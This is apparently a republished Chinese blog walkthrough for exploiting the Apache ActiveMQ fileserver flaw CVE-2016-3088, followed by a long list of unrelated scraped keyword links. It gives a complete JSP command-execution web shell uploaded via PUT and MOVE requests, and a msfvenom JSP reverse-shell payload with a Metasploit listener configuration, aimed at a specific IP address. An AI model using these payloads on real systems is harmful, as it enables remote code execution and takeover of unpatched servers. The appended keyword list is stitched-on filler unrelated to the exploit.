Apache ActiveMQ 远程代码执行漏洞 (CVE-
发表于:2024-11-27 作者:千家信息网编辑
千家信息网最后更新 2024年11月27日,简介:2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程***者用恶意代码替代Web应用
千家信息网最后更新 2024年11月27日Apache ActiveMQ 远程代码执行漏洞 (CVE-
简介:2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程***者用恶意代码替代Web应用,在受影响系统上执行远程代码(CVE-2016-3088)。8161端口为web控制台端口,本漏洞就出现在web控制台中。ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:其使用率并不高而且文件操作容易出现漏洞。所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
方法1.直接写shell
访问http://120.79.1.70:8161/fileserver 直接用bp拦截之后把post改成put 在往后面加几行
<%@ page import="java.util.*,java.io.*"%> <% %> <% if ( request.getParameter( "comment" ) != null ) { out.println( "Command: " + request.getParameter( "comment" ) + "
" ); Process p = Runtime.getRuntime().exec( request.getParameter( "comment" ) ); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream( in ); String disr = dis.readLine(); while ( disr != null ) { out.println( disr ); disr = dis.readLine(); } } %>
如下图:chen.txt:
返回204代表成功,之后再把put改成move 后面再加一行
Destination:file:///opt/activemq/webapps/api/s.jsp
最后直接访问 后面加一个api就成功了
方法2.利用 cron 定时任务写 shell
现在kali里面生成一个***
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.199.109 LPORT=9999 r> bing.jsp
再把他上传到桌面进行打开如下图:
之后和之前一样 在第一行的后面添加一行
Destination:file:///opt/activemq/webapps/api/s.jsp
到网站上进行查看有没有
之后打开kali
use exploit/multi/handlerset payload java/jsp_shell_reverse_tcpset lhost 192.168.199.109set lport 9999run
进行监听就成功了!
文件
应用
漏洞
成功
一行
接口
控制台
控制
代码
安全
方法
版本
端口
存储
登录
三个
二进制
人员
代表
任务
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
系统数据处理软件开发
php循环抽数据库
软件开发的待遇
游戏服务器租用选择
如何连接多个数据库源
磁盘阵列柜 与服务器
新时期网络安全的挑战与应对
爱企推软件开发工作室
鸿蒙2.0软件开发
数据库系统管理的意义
工业园区工商软件开发售后保障
数据库原生查询数据库
山西省网络安全等级保护推荐厂商
喋血复仇怎么切换服务器
全球软件开发大会 视频
合肥h3c服务器报价
王牌战争16天服务器怎么开
安康展厅多媒体软件开发公司
四大神兽数据库
代理服务器 切换
网络安全 责任部门
网络技术发展心得
日常网络安全监测制度
广东c语言软件开发大概要多少钱
如果从事软件开发
数据库后端开发面试题
ps5 2k22好友联机连不上服务器
上海市启梦网络技术有限公司
江苏个性化软件开发价钱
gr服务器